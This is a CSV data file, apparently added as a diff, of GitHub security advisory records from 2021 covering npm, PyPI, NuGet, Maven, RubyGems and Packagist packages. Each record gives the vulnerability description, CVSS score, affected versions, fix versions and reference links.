+1.4.0,GHSA-7r28-3m3f-r2pr,2023-08-15T22:24:00Z,2021-03-19T21:25:50Z,,['CVE-2021-28092'],Regular Expression Denial of Service (ReDoS),"The is-svg package 2.1.0 through 4.2.1 for Node.js uses a regular expression that is vulnerable to Regular Expression Denial of Service (ReDoS). If an attacker provides a malicious string, is-svg will get stuck processing the input.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'is-svg'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '4.2.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28092'}, {'type': 'WEB', 'url': 'https://github.com/sindresorhus/is-svg/commit/01f8a087fab8a69c3ac9085fbb16035907ab6a5b'}, {'type': 'WEB', 'url': 'https://github.com/sindresorhus/is-svg/releases'}, {'type': 'WEB', 'url': 'https://github.com/sindresorhus/is-svg/releases/tag/v4.2.2'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210513-0008/'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/is-svg'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-15T18:19:52Z', 'nvd_published_at': '2021-03-12T22:15:00Z'}"
+1.4.0,GHSA-57f3-gghm-9mhc,2023-09-08T20:22:14Z,2021-03-12T21:28:46Z,,['CVE-2021-23353'],jspdf vulnerable to Regular Expression Denial of Service (ReDoS),This affects the package jspdf before 2.3.1. ReDoS is possible via the addImage function.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'jspdf'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23353'}, {'type': 'WEB', 'url': 'https://github.com/MrRio/jsPDF/pull/3091'}, {'type': 'WEB', 'url': 'https://github.com/MrRio/jsPDF/commit/d8bb3b39efcd129994f7a3b01b632164144ec43e'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1083289'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1083287'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBMRRIO-1083288'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1083286'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-JSPDF-1073626'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-12T21:11:28Z', 'nvd_published_at': '2021-03-09T19:15:00Z'}"
+1.4.0,GHSA-p6p8-q4pj-f74m,2021-03-19T19:21:49Z,2021-03-29T16:28:42Z,,['CVE-2020-24392'],Improper Certificate Validation in twitter-stream,"In voloko twitter-stream 0.1.16, missing TLS hostname validation allows an attacker to perform a man-in-the-middle attack against users of the library (because eventmachine is misused).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'twitter-stream'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.16'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-24392'}, {'type': 'WEB', 'url': 'https://github.com/voloko/twitter-stream'}, {'type': 'ADVISORY', 'url': 'https://securitylab.github.com/advisories/GHSL-2020-097-voloko-twitter-stream'}]","{'cwe_ids': ['CWE-295'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-19T19:21:49Z', 'nvd_published_at': '2021-02-19T23:15:00Z'}"
+1.4.0,GHSA-9qw8-ccq9-ffj9,2021-03-22T22:45:46Z,2021-03-29T20:57:53Z,,['CVE-2019-1139'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-1131, CVE-2019-1140, CVE-2019-1141, CVE-2019-1195, CVE-2019-1196, CVE-2019-1197.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.12'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-1139'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/6b1250b6ffea7006226dd937e52cf5b353fcfc15'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/ae8a8d9644e677a9878e5dd7824d4b876454e799'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1139'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T22:45:46Z', 'nvd_published_at': '2019-08-14T21:15:00Z'}"
+1.4.0,GHSA-grvw-q343-58wh,2021-03-23T15:15:58Z,2021-03-29T20:55:57Z,,['CVE-2019-1300'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-1138, CVE-2019-1217, CVE-2019-1237, CVE-2019-1298.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.13'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-1300'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/7e9a2ee60baa95ceb4f48f522f823c812ca90c80'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/95b3e3400afb8fa20743657f3a8057fb451e6f69'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1300'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-23T15:15:58Z', 'nvd_published_at': '2019-09-11T22:15:00Z'}"
+1.4.0,GHSA-jq4v-f5q6-mjqq,2023-09-05T14:33:14Z,2021-03-22T16:53:53Z,,['CVE-2021-28957'],lxml vulnerable to Cross-Site Scripting ,"An XSS vulnerability was discovered in the python `lxml` clean module versions before 4.6.3. When disabling `the safe_attrs_only` and `forms` arguments, the `Cleaner` class does not remove the `formaction` attribute allowing for JS to bypass the sanitizer. A remote attacker could exploit this flaw to run arbitrary JS code on users who interact with incorrectly sanitized HTML. This issue is patched in `lxml` 4.6.3.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'lxml'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.6.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28957'}, {'type': 'WEB', 'url': 'https://github.com/lxml/lxml/pull/316'}, {'type': 'WEB', 'url': 'https://github.com/lxml/lxml/pull/316/commits/10ec1b4e9f93713513a3264ed6158af22492f270'}, {'type': 'WEB', 'url': 'https://github.com/lxml/lxml/commit/2d01a1ba8984e0483ce6619b972832377f208a0d'}, {'type': 'WEB', 'url': 'https://github.com/lxml/lxml/commit/a5f9cb52079dc57477c460dbe6ba0f775e14a999'}, {'type': 'WEB', 'url': 'https://bugs.launchpad.net/lxml/+bug/1888153'}, {'type': 'PACKAGE', 'url': 'https://github.com/lxml/lxml'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/03/msg00031.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3C2R44VDUY7FJVMAVRZ2WY7XYL4SVN45/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XXN3QPWCTQVOGW4BMWV3AUUZZ4NRZNSQ/'}, {'type': 'WEB', 'url': 'https://pypi.org/project/lxml'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202208-06'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210521-0004/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4880'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T16:52:59Z', 'nvd_published_at': '2021-03-21T05:15:00Z'}"
+1.4.0,GHSA-w89r-qch4-8jv5,2021-03-18T21:22:56Z,2021-03-29T20:59:59Z,,['CVE-2019-0912'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-0913, CVE-2019-0914, CVE-2019-0915, CVE-2019-0916, CVE-2019-0917, CVE-2019-0922, CVE-2019-0923, CVE-2019-0924, CVE-2019-0925, CVE-2019-0927, CVE-2019-0933, CVE-2019-0937.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-0912'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/936a5af1c07e0fdec9aab85c05339dabe4aaeeb1'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/d797e3f00e34c12c8c0ae52f56344325439dccd7'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0912'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T21:22:56Z', 'nvd_published_at': '2019-05-16T19:29:00Z'}"
+1.4.0,GHSA-7h8v-2v8x-h264,2021-03-24T23:17:53Z,2021-03-29T20:42:19Z,,['CVE-2020-25700'],SQL Injection in moodle,"In moodle, some database module web services allowed students to add entries within groups they did not belong to. Versions affected: 3.9 to 3.9.2, 3.8 to 3.8.5, 3.7 to 3.7.8, 3.5 to 3.5.14 and earlier unsupported versions. This is fixed in moodle 3.8.6, 3.7.9, 3.5.15, and 3.10.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.9.0'}, {'fixed': '3.9.3'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.8.0'}, {'fixed': '3.8.6'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.7.0'}, {'fixed': '3.7.9'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.5.0'}, {'fixed': '3.5.15'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-25700'}, {'type': 'WEB', 'url': 'https://github.com/moodle/moodle/commit/8169aeff59d8ed910ca3545413561005282bbd32'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1895427'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4NNFCHPPHRJNJROIX6SYMHOC6HMKP3GU/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/B55KXBVAT45MDASJ3EK6VIGQOYGJ4NH6/'}, {'type': 'WEB', 'url': 'https://moodle.org/mod/forum/discuss.php?d=413938'}]","{'cwe_ids': ['CWE-89'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-24T23:17:53Z', 'nvd_published_at': '2020-11-19T17:15:00Z'}"
+1.4.0,GHSA-p75f-g7gx-2r7p,2022-06-06T18:11:44Z,2021-03-08T20:38:35Z,,['CVE-2021-21336'],Exposure of Sensitive Information to an Unauthorized Actor in Products.PluggableAuthService ZODBRoleManager,"### Impact
+_What kind of vulnerability is it? Who is impacted?_
+
+Information disclosure vulnerability - everyone can list the names of roles defined in the ZODB Role Manager plugin if the site uses this plugin.
+
+### Patches
+_Has the problem been patched? What versions should users upgrade to?_
+
+The problem has been fixed in version 2.6.0. Depending on how you have installed Products.PluggableAuthService, you should change the buildout version pin to 2.6.0 and re-run the buildout, or if you used pip simply do `pip install ""Products.PluggableAuthService>=2.6.0""`
+
+### Workarounds
+_Is there a way for users to fix or remediate the vulnerability without upgrading?_
+
+There is no workaround. Users are encouraged to upgrade.
+
+### References
+_Are there any links users can visit to find out more?_
+
+- [GHSA-p75f-g7gx-2r7p](https://github.com/zopefoundation/Products.PluggableAuthService/security/advisories/GHSA-p75f-g7gx-2r7p)
+- [Products.PluggableAuthService on PyPI](https://github.com/zopefoundation/Products.PluggableAuthService)
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in the [Products.PluggableAuthService issue tracker](https://github.com/zopefoundation/Products.PluggableAuthService/issues)
+* Email us at [security@plone.org](mailto:security@plone.org)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Products.PluggableAuthService'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/zopefoundation/Products.PluggableAuthService/security/advisories/GHSA-p75f-g7gx-2r7p'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21336'}, {'type': 'WEB', 'url': 'https://github.com/zopefoundation/Products.PluggableAuthService/commit/2dad81128250cb2e5d950cddc9d3c0314a80b4bb'}, {'type': 'PACKAGE', 'url': 'https://github.com/zopefoundation/Products.PluggableAuthService'}, {'type': 'WEB', 'url': 'https://pypi.org/project/Products.PluggableAuthService/'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/05/21/1'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/05/22/1'}]","{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-08T20:38:23Z', 'nvd_published_at': '2021-03-08T21:15:00Z'}"
+1.4.0,GHSA-qc65-cgvr-93p6,2022-07-05T18:01:04Z,2021-03-19T21:19:18Z,,['CVE-2021-23356'],Code injection in kill-process-by-name,"This affects all versions of package kill-process-by-name. If (attacker-controlled) user input is given, it is possible for an attacker to execute arbitrary commands. This is due to use of the child_process exec function without input sanitization in the index.js file.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'kill-process-by-name'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23356'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-KILLPROCESSBYNAME-1078534'}]","{'cwe_ids': ['CWE-77'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-03-16T22:24:54Z', 'nvd_published_at': '2021-03-15T17:15:00Z'}"
+1.4.0,GHSA-v89p-5hr2-4rh4,2021-03-22T23:16:52Z,2021-03-29T20:56:15Z,,['CVE-2019-1197'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-1131, CVE-2019-1139, CVE-2019-1140, CVE-2019-1141, CVE-2019-1195, CVE-2019-1196.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.12'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-1197'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/6b1250b6ffea7006226dd937e52cf5b353fcfc15'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/bf52b6cfa96d6395046d0aaf87396cd7ca13f6cb'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1197'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T23:16:52Z', 'nvd_published_at': '2019-08-14T21:15:00Z'}"
+1.4.0,GHSA-f4w8-cv6p-x6r5,2023-09-04T16:25:47Z,2021-03-18T19:55:13Z,,['CVE-2021-27921'],Pillow Denial of Service by Uncontrolled Resource Consumption,"Pillow before 8.1.1 allows attackers to cause a denial of service (memory consumption) because the reported size of a contained image is not properly checked for a BLP container, and thus an attempted memory allocation can be very large.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Pillow'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27921'}, {'type': 'PACKAGE', 'url': 'https://github.com/python-pillow/Pillow'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/S7G44Z33J4BNI2DPDROHWGVG2U7ZH5JU/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TQQY6472RX4J2SUJENWDZAWKTJJGP2ML/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZTSY25UJU7NJUFHH3HWT575LT4TDFWBZ/'}, {'type': 'WEB', 'url': 'https://pillow.readthedocs.io/en/stable/releasenotes/8.1.1.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202107-33'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-12T23:35:22Z', 'nvd_published_at': '2021-03-03T09:15:00Z'}"
+1.4.0,GHSA-52mq-6jcv-j79x,2021-04-14T19:07:25Z,2021-03-03T02:23:56Z,,['CVE-2021-21320'],User content sandbox can be confused into opening arbitrary documents,"### Impact
+
+The user content sandbox can be abused to trick users into opening unexpected documents after several user interactions. The content can be opened with a `blob` origin from the Matrix client, so it is possible for a malicious document to access user messages and secrets.
+
+### Patches
+
+This has been fixed by https://github.com/matrix-org/matrix-react-sdk/pull/5657, which is included in 3.15.0.
+
+### Workarounds
+
+There are no known workarounds.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'matrix-react-sdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.15.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/matrix-org/matrix-react-sdk/security/advisories/GHSA-52mq-6jcv-j79x'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21320'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/matrix-react-sdk/pull/5657'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/matrix-react-sdk/commit/b386f0c73b95ecbb6ea7f8f79c6ff5171a8dedd1'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/matrix-react-sdk'}]","{'cwe_ids': ['CWE-345'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-03-02T02:47:04Z', 'nvd_published_at': '2021-03-02T03:15:00Z'}"
+1.4.0,GHSA-56p8-3fh9-4cvq,2022-02-08T21:32:10Z,2021-03-22T23:29:09Z,,['CVE-2021-21348'],XStream is vulnerable to an attack using Regular Expression for a Denial of Service (ReDos),"### Impact
+The vulnerability may allow a remote attacker to occupy a thread that consumes maximum CPU time and will never return. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types.
+
+### Patches
+If you rely on XStream's default blacklist of the [Security Framework](https://x-stream.github.io/security.html#framework), you will have to use at least version 1.4.16.
+
+### Workarounds
+See [workarounds](https://x-stream.github.io/security.html#workaround) for the different versions covering all CVEs.
+
+### References
+See full information about the nature of the vulnerability and the steps to reproduce it in XStream's documentation for [CVE-2021-21348](https://x-stream.github.io/CVE-2021-21348.html).
+
+### Credits
+The vulnerability was discovered and reported by threedr3am.
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [XStream](https://github.com/x-stream/xstream/issues)
+* Contact us at [XStream Google Group](https://groups.google.com/group/xstream-user)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.thoughtworks.xstream:xstream'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.16'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/x-stream/xstream/security/advisories/GHSA-56p8-3fh9-4cvq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21348'}, {'type': 'PACKAGE', 'url': 'https://github.com/x-stream/xstream'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8244fd0831db894d5e89911ded9c72196d395a90ae655414d23ed0dd@%3Cusers.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9ac71b047767205aa22e3a08cb33f3e0586de6b2fac48b425c6e16b0@%3Cdev.jmeter.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/04/msg00002.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/22KVR6B5IZP3BGQ3HPWIO2FWWCKT3DHP/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PVPHZA7VW2RRSDCOIPP2W6O5ND254TU7/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QGXIU3YDPG6OGTDHMBLAFN7BPBERXREB/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210430-0002/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5004'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/CVE-2021-21348.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/security.html#workaround'}, {'type': 'WEB', 'url': 'http://x-stream.github.io/changes.html#1.4.16'}]","{'cwe_ids': ['CWE-400', 'CWE-502'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T23:25:49Z', 'nvd_published_at': '2021-03-23T00:15:00Z'}"
+1.4.0,GHSA-xhfx-hgmf-v6vp,2021-03-10T21:07:08Z,2021-03-10T21:07:25Z,,['CVE-2021-21265'],Potential Host Header Poisoning on misconfigured servers,"### Impact
+When running on servers that are configured to accept a wildcard as a hostname (i.e. the server routes any request, regardless of the HOST header to an October CMS instance) the potential exists for Host Header Poisoning attacks to succeed. See the following resources for more information on Host Header Poisoning:
+- https://portswigger.net/web-security/host-header
+- https://dzone.com/articles/what-is-a-host-header-attack
+
+### Patches
+
+A feature has been added in v1.1.2 to allow a set of trusted hosts to be specified in the application.
+
+### Workarounds
+
+- Apply https://github.com/octobercms/library/commit/f86fcbcd066d6f8b939e8fe897409d152b11c3c6 & https://github.com/octobercms/october/commit/f638d3f78cfe91d7f6658820f9d5e424306a3db0 to your installation manually if unable to upgrade to v1.1.2.
+
+- Check that the configuration setting `cms.linkPolicy` is set to `force`.
+
+### Alternative Workaround
+
+Check to make sure that your web server does not accept any hostname when serving your web application.
+
+1. Add an entry called `testing.tld` to your computer's host file and direct it to your server's IP address
+2. Open the address `testing.tld` in your web browser
+3. Make sure an October CMS website is not available at this address
+
+If an October CMS website is returned, configure your webserver to only allow known hostnames. If you require assistance with this, please contact your server administrator.
+
+### References
+
+Reported by [Abdullah Hussam](https://github.com/ahussam)
+
+### For More Information
+
+If you have any questions or comments about this advisory:
+* Email us at [hello@octobercms.com](mailto:hello@octobercms.com)
+
+### Threat Assessment
+
",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'october/backend'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/octobercms/october/security/advisories/GHSA-xhfx-hgmf-v6vp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21265'}, {'type': 'WEB', 'url': 'https://github.com/octobercms/library/commit/f86fcbcd066d6f8b939e8fe897409d152b11c3c6'}, {'type': 'WEB', 'url': 'https://github.com/octobercms/october/commit/f638d3f78cfe91d7f6658820f9d5e424306a3db0'}, {'type': 'WEB', 'url': 'https://packagist.org/packages/october/backend'}]","{'cwe_ids': ['CWE-644'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-03-10T21:07:08Z', 'nvd_published_at': '2021-03-10T22:15:00Z'}"
+1.4.0,GHSA-8mrf-64fw-2x75,2021-03-25T21:05:18Z,2021-03-25T21:06:41Z,,['CVE-2020-8298'],Command injection in fs-path,"fs-path node module before 0.0.25 is vulnerable to command injection by way of user-supplied inputs via the `copy`, `copySync`, `remove`, and `removeSync` methods.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'fs-path'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.25'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8298'}, {'type': 'WEB', 'url': 'https://github.com/pillys/fs-path/pull/6'}, {'type': 'WEB', 'url': 'https://github.com/pillys/fs-path/commit/88ff5ee51046bb2c5d5e9c5afe6819b032092ce7'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/324491'}]","{'cwe_ids': ['CWE-77'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-03-25T21:05:18Z', 'nvd_published_at': '2021-03-04T20:15:00Z'}"
